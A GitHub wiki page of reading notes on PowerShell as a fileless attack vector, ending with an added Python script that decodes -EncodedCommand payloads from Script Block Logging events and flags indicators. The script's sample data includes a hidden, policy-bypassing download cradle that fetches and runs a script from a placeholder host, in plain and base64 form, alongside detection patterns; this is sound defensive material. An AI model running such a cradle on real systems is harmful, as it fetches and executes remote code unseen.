Remote Code Execution (RCE) - Salem73616C656D/reading-notes GitHub Wiki
Key Takeaways
Why Is PowerShell An Effective Attack Vector
Virus-infected files and malicious trojans are established malware types, and defenders have mature detection and mitigation techniques for them. Browsers verify downloaded files; applications need approved permissions before installation; and security software can scan files as they are written, read, or executed and check them against known signatures. Even malware delivered via Microsoft Office macros is obstructed by default settings that no longer allow automatic execution. PowerShell sidesteps most of these file-centric controls: it is a signed, built-in Windows component, so an attacker can run a script or an encoded one-liner entirely in memory without dropping an executable for a file scanner to inspect, and the activity blends in with legitimate administration.
Prominent Attacks And Infections Using PS
Because resources for using and abusing PowerShell are readily available online, malicious actors of varying sophistication have adopted it. Since the first reports in 2014, threat actors have run campaigns that use social engineering to infect systems, combining PowerShell with other exploits or copying routines seen in other campaigns as part of their own research and development.
One of the most infamous compromises that used PowerShell for intrusion was linked to the release of internal emails from the Democratic National Committee by the adversary group Pawn Storm in 2016. Although it was discovered that year, forensic investigation of the network showed initial compromise as far back as 2015, with a backdoor delivered by a single PowerShell command, and other deployments matching the same routine began as early as 2014. The Equifax breach in 2017 demonstrated the depth and extent of damage that malicious actors can cause, using PowerShell after exploiting an unpatched vulnerability. In 2018, another cyberespionage group, APT33, sent spear-phishing emails targeting the aviation and oil industries; the attachment executed a PowerShell command that downloaded malware and established persistence inside the company's network.
Mitigations And Best Practices
Administrators are already busy securing and maintaining systems onsite and remotely, so the addition of fileless threats can overwhelm manual security operations and inexperienced personnel. But tracking PowerShell activity, recovering the deobfuscated events and payloads, monitoring, and becoming familiar with its normal behaviour are skills that can be learned and developed.
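As an added example (not part of the original notes or the article they summarise), the script below shows the "track, deobfuscate, monitor" loop in code: it takes the ScriptBlockText of PowerShell Script Block Logging events (Event ID 4104), recovers the plaintext behind an `-EncodedCommand` argument (base64 of UTF-16LE, which is why the fileless one-liner from the first section never touches disk as a recognisable script), and flags common indicators such as download cradles and hidden windows. The sample events are constructed for the example, the indicator list is an assumed starting point rather than an authoritative signature set, and the `example.invalid` host is a placeholder.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) text for fileless-attack
indicators and recover the plaintext behind -EncodedCommand.

Added example; the events below are constructed, not real telemetry."""
import base64
import re

# Indicators commonly seen in malicious PowerShell one-liners.
# Assumption: a starting point for detection, not an exhaustive signature set.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(ep|ExecutionPolicy)\s+bypass", re.I),
    "noprofile": re.compile(r"-nop\b|-NoProfile", re.I),
    "base64_call": re.compile(r"FromBase64String", re.I),
}

# powershell.exe accepts -e, -ec, -enc or -EncodedCommand followed by base64.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell expects base64 over UTF-16LE, so decoding as UTF-8 would
    produce garbage; invalid base64 or odd-length data is treated as no payload.
    """
    m = ENCODED_CMD.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(script_block_text):
    """Score one script block: indicators are matched on the raw text and,
    when present, on the decoded payload, so encoding does not hide them."""
    decoded = decode_encoded_command(script_block_text)
    views = [script_block_text] + ([decoded] if decoded else [])
    hits = sorted({name for name, rx in INDICATORS.items()
                   for v in views if rx.search(v)})
    if decoded:
        hits.insert(0, "encoded_command")
    return {"decoded": decoded, "hits": hits, "score": len(hits)}


def _b64_utf16(s):
    """Encode a command the way an attacker would for -EncodedCommand."""
    return base64.b64encode(s.encode("utf-16-le")).decode()


# Constructed sample ScriptBlockText values: one benign admin command, one
# cleartext download cradle, and the same cradle hidden behind -enc.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    'powershell -nop -w hidden -ep bypass -c "' + CRADLE + '"',
    "powershell -nop -w hidden -enc " + _b64_utf16(CRADLE),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(r["score"], r["hits"], (r["decoded"] or ev)[:70])
```

Script Block Logging has to be enabled before any of this is available: the events land in the Microsoft-Windows-PowerShell/Operational log once `EnableScriptBlockLogging` is set under `HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging` (or the equivalent Group Policy). Because the logger records the script block after PowerShell has decoded and parsed it, the same 4104 stream also exposes layers of obfuscation beyond a single base64 wrapper, which is what makes "finding the deobfuscated events and payloads" tractable.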